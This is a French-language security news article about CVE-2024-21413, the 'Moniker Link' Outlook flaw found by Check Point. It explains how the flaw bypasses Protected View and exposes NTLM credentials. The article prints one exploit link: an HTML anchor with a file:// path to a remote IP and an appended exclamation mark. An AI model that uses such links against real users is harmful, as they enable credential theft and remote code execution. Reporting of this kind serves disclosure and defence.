Microsoft a mis à jour aujourd’hui un avis de sécurité pour avertir qu’un bogue critique d’Outlook a été exploité dans des attaques en tant que jour zéro avant d’être corrigé lors du Patch Tuesday de ce mois-ci.
Découverte par Haifei Li, chercheur en vulnérabilités de Check Point et suivie comme CVE-2024-21413, cette vulnérabilité conduit à l’exécution de code à distance (RCE) lors de l’ouverture d’e-mails contenant des liens malveillants à l’aide d’une version vulnérable de Microsoft Outlook.
Cela est dû au fait que la faille permet également aux attaquants de contourner la vue protégée (conçue pour bloquer le contenu nuisible intégré dans les fichiers Office en les ouvrant en mode lecture seule) et d’ouvrir des fichiers Office malveillants en mode édition.
Redmond a également averti que le volet de prévisualisation est un vecteur d’attaque pour cette faille de sécurité, permettant une exploitation réussie même lors de la prévisualisation de documents Office conçus de manière malveillante dans l’Explorateur Windows.
Des attaquants non authentifiés peuvent exploiter CVE-2024-21413 à distance dans le cadre d’attaques de faible complexité qui ne nécessitent pas d’interaction de l’utilisateur.
« Un attaquant qui parviendrait à exploiter cette vulnérabilité pourrait obtenir des privilèges élevés, notamment des fonctionnalités de lecture, d’écriture et de suppression », explique Microsoft.
« Un attaquant pourrait créer un lien malveillant qui contournerait le protocole Protected View, ce qui entraînerait la fuite des informations d’identification NTLM locales et l’exécution de code à distance (RCE). »
CVE-2024-21413 affecte plusieurs produits Office, notamment Microsoft Office LTSC 2021 et Microsoft 365 Apps for Enterprise, ainsi que Microsoft Outlook 2016 et Microsoft Office 2019 (sous support étendu).
Point d’exclamation pour contourner les protections Outlook
Comme l’explique Check Point dans un rapport publié aujourd’hui, la vulnérabilité qu’ils ont baptisée Moniker Link permet aux attaquants de contourner les protections Outlook intégrées contre les liens malveillants intégrés dans les e-mails en utilisant le protocole file:// et en ajoutant un point d’exclamation aux URL pointant vers l’attaquant. serveurs contrôlés.
Le point d’exclamation est ajouté juste après l’extension du document, accompagné d’un texte aléatoire (dans son exemple, Check Point a utilisé « quelque chose »), comme indiqué ci-dessous :
*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Ce type de lien hypertexte contourne les restrictions de sécurité d’Outlook et Outlook accédera à la ressource distante « \10.10.111.111\test\test.rtf » lorsque vous cliquez sur le lien sans générer d’avertissements ou d’erreurs.
La faille a été introduite en raison de l’API non sécurisée MkParseDisplayName, de sorte que la vulnérabilité peut également affecter d’autres logiciels qui l’utilisent.
L’impact des attaques exploitant avec succès CVE-2024-21413 inclut le vol d’informations d’identification NTLM, l’exécution de code arbitraire via des documents Office conçus de manière malveillante,
« Nous avons confirmé ce vecteur de bug/attaque #MonikerLink sur les derniers environnements Windows 10/11 + Microsoft 365 (Office 2021) », a déclaré Check Point.
« D’autres éditions/versions d’Office sont probablement également affectées. En fait, nous pensons qu’il s’agit d’un problème négligé qui existe dans l’écosystème Windows/COM depuis des décennies, car il se trouve au cœur des API COM. Nous recommandons fortement à tous les utilisateurs d’Outlook appliquez le patch officiel dès que possible. »
Un porte-parole de Microsoft n’était pas immédiatement disponible lorsque Breachtrace a demandé plus de détails concernant l’exploitation du CVE-2024-21413 dans la nature.